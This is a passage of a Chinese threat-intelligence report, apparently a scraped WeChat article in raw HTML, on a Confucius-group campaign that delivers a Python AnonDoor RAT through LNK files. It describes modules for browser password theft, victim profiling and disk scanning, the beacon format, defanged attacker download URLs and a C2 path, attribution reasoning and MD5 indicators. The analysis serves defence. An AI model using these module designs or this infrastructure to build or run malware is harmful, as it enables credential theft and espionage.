15px;">hjjkhfdj_FL2F</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">cgDFjhdfhfh444</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">文件列表</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_DW2D</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">fhdge35fghdfjht</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">下载器 I。通用的单文件下载模块。</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_DL2DD</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">fhg5ggrrrgb</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">下载器 II</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_PSS</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">fgge5pvdcfghj</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">浏览器凭据窃取(Password Stealer)。针对Firefox和Edge浏览器进行定向窃密。</span></span></p></td></tr><tr><td data-colwidth="141"><p><span leaf=""><span textstyle="" style="font-size: 15px;">hjjkhfdj_FD2D</span></span></p></td><td data-colwidth="162"><p><span leaf=""><span textstyle="" style="font-size: 15px;">fhdtgjuet3dS</span></span></p></td><td data-colwidth="274"><p><span leaf=""><span textstyle="" style="font-size: 15px;">目录列表</span></span></p></td></tr></tbody></table><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3.2）</span><span leaf="">后续功能模块分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">后续攻击者会根据目标特点下发多种模块，在此列举初期的两种加载模块。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">模块一：用户信息收集模块</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">其主要目的是收集受害者的系统信息，生成唯一的“受害者 ID”（Bot ID），并将这些信息打包返回给主控端收集的信息及格式如下：</span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;font-style: italic;">ibjfkhg = {UUID}$!!${Windows版本}$!!${主机名+用户}$!!${局域网IP}$!!${公网IP}$!!${国家}$!!${系统详细名}$!!$</span></span></p></td></tr></tbody></table><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024172" data-ratio="0.3537331701346389" data-w="817" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=6f9e1ca5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIsXa4vhrSupyDX7oDktz9JLBgHcUCuHy3j3icgmTWy1cEM1lSdKtuEC9IAAmntPFhjuDjRELdwIHSs38MO0YGkEDUr6qpCw3mw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">模块二：存储器扫描模块</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">它利用ctypes直接操作Windows API获取底层磁盘信息，将受害者的存储布局发送回C2服务器。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024173" data-ratio="0.3965317919075145" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=3db6e447&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKMSn58P1PicmG4UYgcg87keJob7rWicMUdx0LSsicsPVI0aYt5fX7qQjWeSMOF8Z8jXoK4oX9D12SicKlrAoc01pOvYum8vT42d8A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">通过对捕获样本整体分析，我们发现本次攻击行动与Confucius组织之前使用的攻击手段相符合，具体包括以下几点。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1. 在初始攻击阶段，Confucius组织惯常利用LNK文件启动恶意程序。该恶意文件会访问3个URL下载链接，分别用于获取白组件、黑组件以及诱饵文档。相关URL具有较为明显的特征，均使用.info域名。此外，在文件名构词逻辑上也与该组织以往样本高度同源，通常表现为首字母大写+随机字符组合，且并非标准系统文件格式。URL格式对比如下：</span></span></span></p><table style="width:567px;"><tbody><tr><td data-colwidth="280"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: bold;">之前捕获样本</span></span></p></td><td data-colwidth="287"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-weight: bold;">此次捕获样本</span></span></p></td></tr><tr><td data-colwidth="280"><p><span leaf=""><span textstyle="" style="font-size: 15px;">http[:]//bloomwpp[.]info/WTBXX46.kut</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">http[:]//bloomwpp[.]info/KM9XFY.kut</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">http[:]//bloomwpp[.]info/JRC89.kut</span></span></p></td><td data-colwidth="287"><p><span leaf=""><span textstyle="" style="font-size: 15px;">https[:]//nexnxky[.]info/TO96v.Wst</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">https[:]//nexnxky[.]info/Ytu7Y.Rut</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 15px;">https[:]//nexnxky[.]info/P7DuR.Dtt</span></span></p></td></tr></tbody></table><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2. 本次攻击最终加载的组件是基于Python的AnonDoor RAT，这个类型与Confucius的分析报告[1]提到的木马一致，并且URL结构(都为*.info/lj782mGDl32ki44djfmjkFD3dfjlkh4/Fhjdjkle489_fjGDEkhkDG876F.php)，以及User-Agent、通信格式都高度一致。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">3. 通过对Confucius组织本次攻击事件所涉及的基础设施（upxvion[</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span></span><span leaf="">]info 和 nexnxky[</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span></span><span leaf="">]info）进行网络测绘分析，我们发现这些基础设施的JARM指纹、服务器特征以及“.info”顶级域的使用均符合该组织此前已知的基础设施测绘特征。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">4. 结合受害者为巴基斯坦，符合攻击者目标。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">综上将其本次攻击归属于Confucius组织。</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="3 11 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer"><div data-tools="135编辑器" data-id="101849"><div style="margin-top: 10px;margin-bottom: 10px;"><div style="margin-bottom: -15px;display: flex;transform: rotate(0deg);"><p data-brushtype="text" style="padding-right: 1em;padding-left: 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 17px;"><span leaf="">总结</span></span></strong></span></p></div><div style="margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;"><div data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 14px;"><p style="text-indent: 2em;"><span style="color: rgb(51, 51, 51);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;color: rgb(51, 51, 51);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(242, 242, 242);"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Confucius组织持续针对南亚地区国家发起高频网络攻击，其攻击手法呈现明显的技术升级与模块化趋势。在本次攻击活动中，该组织仍以LNK文件作为初始攻击载体，但最终下发的载荷采用了基于Python的AnonDoor后门--这一新型载荷此前未在该组织的攻击活动中出现，未来极可能被广泛用于后续攻击。面对此类持续演变的定向威胁，各机构及个人用户亟需提升安全防护意识，尤其需警惕可疑邮件附件、非可信来源的压缩文件及诱导性链接，通过主动防御规避潜在风险。</span></span></span></span></p></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">6b0afae982f23b84712147a228886245</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">a3bba6502f987efae30c3951313452e2</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">422bf81af2f0e461ede2020648217e16</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">e34ff54e8ae202c25e3c9db51f39a172</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">777ee7d08db5bf86a1187a540dc2ffba</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4046cd7a59764a6db7132d79a4cf7a8c</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">00f67ef1cb0d81bdd3f71f4039d2d29f</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft 